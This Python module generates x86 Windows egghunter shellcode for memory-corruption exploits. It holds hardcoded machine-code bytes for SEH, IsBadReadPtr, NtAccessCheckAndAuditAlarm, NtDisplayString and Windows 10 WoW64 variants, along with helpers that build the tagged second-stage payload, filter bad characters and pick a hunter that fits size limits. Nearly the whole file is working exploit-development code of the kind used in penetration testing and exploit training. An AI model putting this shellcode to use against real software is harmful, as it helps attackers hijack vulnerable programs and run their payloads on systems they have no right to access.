from __future__ import annotations

from dataclasses import dataclass
from pathlib import Path
from typing import Callable, Iterable, Literal

HunterKind = Literal[
    "x86_seh",
    "x86_isbadreadptr",
    "x86_ntdisplaystring",
    "x86_ntaccess",
    "x86_wow64_win10_ntaccess",
]


class EgghunterError(Exception):
    """Base error for egghunter generation."""


class UnsupportedHunterError(EgghunterError):
    """Raised when a requested hunter is not implemented."""


class BadCharError(EgghunterError):
    """Raised when generated bytes contain excluded characters."""


class SelectionError(EgghunterError):
    """Raised when no hunter variant satisfies the requested constraints."""


@dataclass(frozen=True, slots=True)
class HunterSpec:
    name: str
    arch: str
    size: int | None
    needs_api_address: bool = False
    needs_syscall_id: bool = False
    notes: str = ""


@dataclass(frozen=True, slots=True)
class BuildResult:
    kind: HunterKind
    tag: bytes
    shellcode: bytes

    @property
    def hex_escaped(self) -> str:
        return to_hex_escaped(self.shellcode)

    @property
    def python_bytes_literal(self) -> str:
        return f'b"{self.hex_escaped}"'

    def write_raw(self, path: str | Path) -> Path:
        return write_raw(path, self.shellcode)


@dataclass(frozen=True, slots=True)
class HunterCandidate:
    name: str
    shellcode: bytes
    size: int
    uses_syscall: bool
    arch: str = "x86"


SPECS: dict[HunterKind, HunterSpec] = {
    "x86_seh": HunterSpec(
        name="SEH egghunter",
        arch="x86",
        size=69,
        notes="Classic SEH-based hunter.",
    ),
    "x86_isbadreadptr": HunterSpec(
        name="IsBadReadPtr egghunter",
        arch="x86",
        size=37,
        needs_api_address=True,
        notes="Requires IsBadReadPtr address from the target process.",
    ),
    "x86_ntdisplaystring": HunterSpec(
        name="NtDisplayString egghunter",
        arch="x86",
        size=None,
        needs_syscall_id=True,
        notes="System-call probe hunter (dynamic syscall loader).",
    ),
    "x86_ntaccess": HunterSpec(
        name="NtAccessCheckAndAuditAlarm egghunter",
        arch="x86",
        size=None,
        needs_syscall_id=True,
        notes="System-call probe hunter (dynamic syscall loader).",
    ),
    "x86_wow64_win10_ntaccess": HunterSpec(
        name="Windows 10 WoW64 egghunter",
        arch="x86 (WoW64)",
        size=39,
        notes="Win10/WoW64-specific syscall path.",
    ),
}


def specs() -> dict[HunterKind, HunterSpec]:
    return dict(SPECS)


def to_hex_escaped(buf: bytes) -> str:
    return "".join(f"\\x{b:02x}" for b in buf)


def write_raw(path: str | Path, data: bytes) -> Path:
    out = Path(path)
    out.write_bytes(data)
    return out


def normalize_badchars(excluded: bytes | Iterable[int]) -> bytes:
    if isinstance(excluded, bytes):
        vals = list(excluded)
    else:
        vals = [int(x) & 0xFF for x in excluded]
    return bytes(sorted(set(vals)))


def validate_tag(tag: bytes) -> None:
    if len(tag) != 4:
        raise EgghunterError("Tag must be exactly 4 bytes")


def validate_badchars(buf: bytes, excluded: bytes | Iterable[int]) -> None:
    badchars = normalize_badchars(excluded)
    hits = sorted(set(buf) & set(badchars))
    if hits:
        rendered = " ".join(f"{b:02x}" for b in hits)
        raise BadCharError(f"Generated hunter contains excluded byte(s): {rendered}")


def build_egg(tag: bytes = b"W00T") -> bytes:
    validate_tag(tag)
    return tag + tag


def build_stage2(tag: bytes, payload: bytes) -> bytes:
    return build_egg(tag) + payload


def _pack32(value: int) -> bytes:
    if not (0 <= value <= 0xFFFFFFFF):
        raise EgghunterError("32-bit value out of range")
    return value.to_bytes(4, "little", signed=False)


def _encode_syscall_push_or_neg(syscall_id: int, excluded: bytes) -> bytes:
    if 0 <= syscall_id <= 0x7F:
        candidate = b"\x6a" + bytes([syscall_id]) + b"\x58"
        validate_badchars(candidate, excluded)
        return candidate

    neg_val = (0x100000000 - syscall_id) & 0xFFFFFFFF
    candidate = b"\xb8" + _pack32(neg_val) + b"\xf7\xd8"
    validate_badchars(candidate, excluded)
    return candidate


def hunter_x86_seh(tag: bytes, excluded: bytes = b"") -> bytes:
    validate_tag(tag)
    shellcode = (
        b"\xeb\x21\x59\xb8" + tag +
        b"\x51\x6a\xff\x33\xdb\x64\x89\x23\x6a\x02\x59\x8b\xfb\xf3\xaf"
        b"\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f\x43\xeb\xed\xe8\xda\xff"
        b"\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8\x83\x04\x08\x06\x58"
        b"\x83\xc4\x10\x50\x33\xc0\xc3"
    )
    validate_badchars(shellcode, excluded)
    return shellcode


def hunter_x86_isbadreadptr(tag: bytes, isbadreadptr_addr: int, excluded: bytes = b"") -> bytes:
    validate_tag(tag)
    shellcode = (
        b"\x33\xdb\x66\x81\xcb\xff\x0f\x43\x6a\x08\x53\xb8"
        + _pack32(isbadreadptr_addr)
        + b"\xff\xd0\x85\xc0\x75\xec\xb8"
        + tag
        + b"\x8b\xfb\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"
    )
    validate_badchars(shellcode, excluded)
    return shellcode


def hunter_x86_ntaccess(tag: bytes, syscall_id: int = 0x02, excluded: bytes = b"") -> bytes:
    validate_tag(tag)
    excluded_norm = normalize_badchars(excluded)
    syscall_load = _encode_syscall_push_or_neg(syscall_id, excluded_norm)

    shellcode = (
        b"\x66\x81\xca\xff\x0f"
        b"\x42"
        b"\x52"
        + syscall_load
        + b"\xcd\x2e"
        b"\x3c\x05"
        b"\x5a"
        b"\x74"
    )

    if len(syscall_load) == 3:
        shellcode += b"\xef"
    elif len(syscall_load) == 7:
        shellcode += b"\xeb"
    else:
        raise EgghunterError("Unexpected syscall loader size")

    shellcode += b"\xb8" + tag + b"\x89\xd7\xaf\x75"
    if len(syscall_load) == 3:
        shellcode += b"\xea"
    else:
        shellcode += b"\xe6"

    shellcode += b"\xaf\x75"
    if len(syscall_load) == 3:
        shellcode += b"\xe7"
    else:
        shellcode += b"\xe3"

    shellcode += b"\xff\xe7"

    validate_badchars(shellcode, excluded_norm)
    return shellcode


def hunter_x86_ntdisplaystring(tag: bytes, syscall_id: int = 0x43, excluded: bytes = b"") -> bytes:
    return hunter_x86_ntaccess(tag=tag, syscall_id=syscall_id, excluded=excluded)


def hunter_x86_wow64_win10_ntaccess(tag: bytes, excluded: bytes = b"") -> bytes:
    validate_tag(tag)
    shellcode = (
        b"\x33\xd2"
        b"\x66\x81\xca\xff\x0f"
        b"\x33\xdb"
        b"\x42"
        b"\x52"
        b"\x53\x53\x53\x53"
        b"\x6a\x29"
        b"\x58"
        b"\xb3\xc0"
        b"\x64\xff\x13"
        b"\x83\xc4\x10"
        b"\x5a"
        b"\x3c\x05"
        b"\x74\xe3"
        b"\xb8" + tag + b"\x8b\xfa\xaf\x75\xde\xaf\x75\xdb\xff\xe7"
    )
    validate_badchars(shellcode, excluded)
    return shellcode


def build(
    kind: HunterKind,
    tag: bytes = b"W00T",
    *,
    excluded: bytes | Iterable[int] = b"",
    syscall_id: int | None = None,
    isbadreadptr_addr: int | None = None,
) -> BuildResult:
    excluded_norm = normalize_badchars(excluded)

    if kind == "x86_seh":
        shellcode = hunter_x86_seh(tag=tag, excluded=excluded_norm)
    elif kind == "x86_isbadreadptr":
        if isbadreadptr_addr is None:
            raise EgghunterError("x86_isbadreadptr requires isbadreadptr_addr")
        shellcode = hunter_x86_isbadreadptr(
            tag=tag,
            isbadreadptr_addr=isbadreadptr_addr,
            excluded=excluded_norm,
        )
    elif kind == "x86_ntdisplaystring":
        shellcode = hunter_x86_ntdisplaystring(
            tag=tag,
            syscall_id=0x43 if syscall_id is None else syscall_id,
            excluded=excluded_norm,
        )
    elif kind == "x86_ntaccess":
        shellcode = hunter_x86_ntaccess(
            tag=tag,
            syscall_id=0x02 if syscall_id is None else syscall_id,
            excluded=excluded_norm,
        )
    elif kind == "x86_wow64_win10_ntaccess":
        shellcode = hunter_x86_wow64_win10_ntaccess(tag=tag, excluded=excluded_norm)
    else:
        raise UnsupportedHunterError(f"Unsupported hunter kind: {kind}")

    return BuildResult(kind=kind, tag=tag, shellcode=shellcode)


def choose_hunter(
    tag: bytes = b"W00T",
    *,
    excluded: bytes = b"",
    max_size: int | None = None,
    prefer_seh: bool = False,
    ntaccess_syscall_id: int = 0x02,
    ntdisplaystring_syscall_id: int = 0x43,
    isbadreadptr_addr: int | None = None,
    allow_variants: list[str] | None = None,
) -> HunterCandidate:
    excluded_norm = normalize_badchars(excluded)

    builders: list[tuple[str, Callable[[], bytes], bool]] = [
        (
            "x86_ntaccess",
            lambda: hunter_x86_ntaccess(tag=tag, syscall_id=ntaccess_syscall_id, excluded=excluded_norm),
            True,
        ),
        (
            "x86_ntdisplaystring",
            lambda: hunter_x86_ntdisplaystring(tag=tag, syscall_id=ntdisplaystring_syscall_id, excluded=excluded_norm),
            True,
        ),
        (
            "x86_seh",
            lambda: hunter_x86_seh(tag=tag, excluded=excluded_norm),
            False,
        ),
        (
            "x86_wow64_win10_ntaccess",
            lambda: hunter_x86_wow64_win10_ntaccess(tag=tag, excluded=excluded_norm),
            True,
        ),
    ]

    if isbadreadptr_addr is not None:
        builders.insert(
            0,
            (
                "x86_isbadreadptr",
                lambda: hunter_x86_isbadreadptr(tag=tag, isbadreadptr_addr=isbadreadptr_addr, excluded=excluded_norm),
                False,
            ),
        )

    if prefer_seh:
        builders.sort(key=lambda item: 0 if item[0] == "x86_seh" else 1)

    if allow_variants is not None:
        allowed = set(allow_variants)
        builders = [entry for entry in builders if entry[0] in allowed]

    errors: list[str] = []
    for name, builder, uses_syscall in builders:
        try:
            shellcode = builder()
            size = len(shellcode)
            if max_size is not None and size > max_size:
                errors.append(f"{name}: size {size} exceeds max_size={max_size}")
                continue
            return HunterCandidate(
                name=name,
                shellcode=shellcode,
                size=size,
                uses_syscall=uses_syscall,
            )
        except Exception as exc:
            errors.append(f"{name}: {exc}")

    raise SelectionError("No valid egghunter found. " + " | ".join(errors))


class Egghunters:
    """Backwards-compatible class wrapper around the module API."""

    @classmethod
    def specs(cls) -> dict[HunterKind, HunterSpec]:
        return specs()

    @staticmethod
    def egg(tag: bytes = b"W00T") -> bytes:
        return build_egg(tag)

    @classmethod
    def build(
        cls,
        kind: HunterKind,
        tag: bytes = b"W00T",
        *,
        isbadreadptr_addr: int | None = None,
        excluded: bytes | Iterable[int] = b"",
        syscall_id: int | None = None,
    ) -> BuildResult:
        return build(
            kind=kind,
            tag=tag,
            excluded=excluded,
            syscall_id=syscall_id,
            isbadreadptr_addr=isbadreadptr_addr,
        )
